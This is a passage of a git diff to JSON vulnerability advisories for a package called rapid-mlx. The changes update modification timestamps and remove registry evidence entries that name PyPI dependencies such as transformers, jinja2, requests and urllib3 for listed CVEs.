"schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2022-1941", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-8gq9-2x98-w8hf", "CVE-2022-1941", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.36.1", - "key": "pkg:pypi/protobuf@7.36.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2022-29217.json b/advisories/BREW-rapid-mlx-CVE-2022-29217.json index ef0b5ab3ff..6187bd7e56 100644 --- a/advisories/BREW-rapid-mlx-CVE-2022-29217.json +++ b/advisories/BREW-rapid-mlx-CVE-2022-29217.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2022-29217", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-ffqj-6fqr-9h24", "CVE-2022-29217", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2022-40896.json b/advisories/BREW-rapid-mlx-CVE-2022-40896.json index e7377aa056..b54ad4f3ea 100644 --- a/advisories/BREW-rapid-mlx-CVE-2022-40896.json +++ b/advisories/BREW-rapid-mlx-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2022-40896", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-20T09:36:55Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-26302.json b/advisories/BREW-rapid-mlx-CVE-2023-26302.json index 2423628c9a..d5fe0991f8 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-26302.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-26302", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-26303.json b/advisories/BREW-rapid-mlx-CVE-2023-26303.json index 2e6a894cdc..6452c7ce8f 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-26303.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-26303", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-2800.json b/advisories/BREW-rapid-mlx-CVE-2023-2800.json index 34fd5f91e4..acbb8c7fec 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-2800.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-2800.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-2800", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-282v-666c-3fvg", "CVE-2023-2800", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-29159.json b/advisories/BREW-rapid-mlx-CVE-2023-29159.json index 733cb3cd22..f9bf5f39ee 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-29159.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-29159.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-29159", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-v5gw-mw7f-84px", "CVE-2023-29159", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-30798.json b/advisories/BREW-rapid-mlx-CVE-2023-30798.json index 6e162eccf2..16b2a34de7 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-30798.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-30798.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-30798", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-74m5-2c7w-9w3x", "CVE-2023-30798", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-32681.json b/advisories/BREW-rapid-mlx-CVE-2023-32681.json index 839d74efa1..e792547f2e 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-32681.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-32681", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-43804.json b/advisories/BREW-rapid-mlx-CVE-2023-43804.json index c2d91264fe..99028c540f 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-43804.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-43804", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-45803.json b/advisories/BREW-rapid-mlx-CVE-2023-45803.json index dbd67e41fc..17a54eb334 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-45803.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-45803", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-6730.json b/advisories/BREW-rapid-mlx-CVE-2023-6730.json index 9da89296c0..d15d0b6f79 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-6730.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-6730.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-6730", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-3863-2447-669p", "CVE-2023-6730", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-7018.json b/advisories/BREW-rapid-mlx-CVE-2023-7018.json index e9c64c913d..2ec6296d34 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-7018.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-7018.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-7018", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-v68g-wm8c-6x7j", "CVE-2023-7018", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-11392.json b/advisories/BREW-rapid-mlx-CVE-2024-11392.json index 133fd5a2a3..53c16e1879 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-11392.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-11392.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-11392", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-qxrp-vhvm-j765", "CVE-2024-11392", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-11393.json b/advisories/BREW-rapid-mlx-CVE-2024-11393.json index 7e82592002..09f1f598ae 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-11393.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-11393.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-11393", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-wrfc-pvp9-mr9g", "CVE-2024-11393", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-11394.json b/advisories/BREW-rapid-mlx-CVE-2024-11394.json index cf5fe13551..db5eda30c5 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-11394.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-11394.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-11394", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-hxxf-235m-72v3", "CVE-2024-11394", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-12720.json b/advisories/BREW-rapid-mlx-CVE-2024-12720.json index 7d9c4285f1..1574b823c8 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-12720.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-12720.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-12720", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-6rvg-6v2m-4j46", "CVE-2024-12720", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-22195.json b/advisories/BREW-rapid-mlx-CVE-2024-22195.json index 1c905e38d0..724cb40b9b 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-22195.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-22195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-22195", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-h5c8-rqwp-cp95", "CVE-2024-22195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-34062.json b/advisories/BREW-rapid-mlx-CVE-2024-34062.json index d3babdb050..3bab395137 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-34062.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-34062.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-34062", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-g7vv-2v7x-gj9p", "CVE-2024-34062", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tqdm", - "subject_version": "4.70.0", - "key": "pkg:pypi/tqdm@4.70.0", - "resource": "tqdm" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-34064.json b/advisories/BREW-rapid-mlx-CVE-2024-34064.json index ee7fb50dd3..02134b9cd3 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-34064.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-34064.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-34064", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-h75v-3vvj-5mfj", "CVE-2024-34064", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-35195.json b/advisories/BREW-rapid-mlx-CVE-2024-35195.json index a4ed1c146a..a617a45864 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-35195.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-35195", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-3568.json b/advisories/BREW-rapid-mlx-CVE-2024-3568.json index b284f13e0d..673c556517 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-3568.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-3568.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-3568", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-37q5-v5qm-c9v8", "CVE-2024-3568", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-3651.json b/advisories/BREW-rapid-mlx-CVE-2024-3651.json index 8f398a5d8e..2a86694ea8 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-3651.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-3651", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-20T09:36:55Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-37891.json b/advisories/BREW-rapid-mlx-CVE-2024-37891.json index 6111b47260..8fe4223b93 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-37891.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-37891", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-47081.json b/advisories/BREW-rapid-mlx-CVE-2024-47081.json index 72a1d98103..899c6ccf70 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-47081.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-47081", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-47874.json b/advisories/BREW-rapid-mlx-CVE-2024-47874.json index 980a42fd73..74f311d3ae 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-47874.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-47874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-47874", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-f96h-pmfr-66vw", "CVE-2024-47874", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-53861.json b/advisories/BREW-rapid-mlx-CVE-2024-53861.json index d973476dc5..96b1ab4afa 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-53861.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-53861.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-53861", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-75c5-xw7c-p5pm", "CVE-2024-53861", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-53981.json b/advisories/BREW-rapid-mlx-CVE-2024-53981.json index 07e81f3f83..dd55fce5f0 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-53981.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-53981.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-53981", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-59g5-xgcq-4qw3", "CVE-2024-53981", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-56201.json b/advisories/BREW-rapid-mlx-CVE-2024-56201.json index dc4cd35e1a..1200e93348 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-56201.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-56201.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-56201", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-gmj6-6f8f-6699", "CVE-2024-56201", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2024-56326.json b/advisories/BREW-rapid-mlx-CVE-2024-56326.json index 5e723feb6d..343daaa974 100644 --- a/advisories/BREW-rapid-mlx-CVE-2024-56326.json +++ b/advisories/BREW-rapid-mlx-CVE-2024-56326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2024-56326", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-q2x7-8rv6-6q7h", "CVE-2024-56326", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-1194.json b/advisories/BREW-rapid-mlx-CVE-2025-1194.json index 94b6363fe5..7953a24034 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-1194.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-1194.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-1194", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-fpwr-67px-3qhx", "CVE-2025-1194", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-2099.json b/advisories/BREW-rapid-mlx-CVE-2025-2099.json index 4d11a7f67e..73eba9d7ed 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-2099.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-2099.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-2099", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-qq3j-4f4f-9583", "CVE-2025-2099", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-27516.json b/advisories/BREW-rapid-mlx-CVE-2025-27516.json index b85e76fa27..c886553e9f 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-27516.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-27516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-27516", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-cpwx-vrp4-4pq7", "CVE-2025-27516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-3262.json b/advisories/BREW-rapid-mlx-CVE-2025-3262.json index 9aeeff7114..5ee9d7a2c5 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-3262.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-3262.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-3262", "published": 